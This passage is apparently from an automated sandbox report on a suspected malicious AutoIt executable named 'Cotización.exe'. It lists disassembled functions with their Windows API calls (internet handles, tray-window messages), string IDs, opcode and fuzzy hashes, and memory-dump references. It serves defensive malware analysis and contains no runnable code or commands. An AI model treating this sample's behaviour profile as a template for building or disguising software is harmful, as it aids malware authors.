                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: htonsinet_addr
                • String ID: 255.255.255.255
                • API String ID: 3832099526-2422070025
                • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                APIs
                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: InternetOpen
                • String ID: <local>
                • API String ID: 2038078732-4266983199
                • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: __fread_nolock_memmove
                • String ID: EA06
                • API String ID: 1988441806-3962188686
                • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _memmove
                • String ID: u,D
                • API String ID: 4104443479-3858472334
                • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                APIs
                • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                • wsprintfW.USER32 ref: 0045612A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: MessageSend_mallocwsprintf
                • String ID: %d/%02d/%02d
                • API String ID: 1262938277-328681919
                • Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                • Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                APIs
                • InternetCloseHandle.WININET(?), ref: 00442663
                • InternetCloseHandle.WININET ref: 00442668
                  • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: CloseHandleInternet$ObjectSingleWait
                • String ID: aeB
                • API String ID: 857135153-906807131
                • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _wcsncpy
                • String ID: ^B$C:\Users\user\Desktop\Cotizaci#U00f3n.exe
                • API String ID: 1735881322-3467619221
                • Opcode ID: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                • Instruction ID: 95fca152a805ab331260cabc3645652019b64b11bc5d0d7a1f408bc65d2df1f2
                • Opcode Fuzzy Hash: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                • Instruction Fuzzy Hash: ADE0C23360051A7B9710DE4AD841DBBF37DEEC4A20B08802AF90883200E2B1BD1A43E4
                APIs
                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                • PostMessageW.USER32(00000000), ref: 00441C05
                  • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: FindMessagePostSleepWindow
                • String ID: Shell_TrayWnd
                • API String ID: 529655941-2988720461
                • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                APIs
                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                  • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: FindMessagePostSleepWindow
                • String ID: Shell_TrayWnd
                • API String ID: 529655941-2988720461
                • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                APIs
                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                  • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Message_doexit
                • String ID: AutoIt$Error allocating memory.
                • API String ID: 1993061046-4017498283
                • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D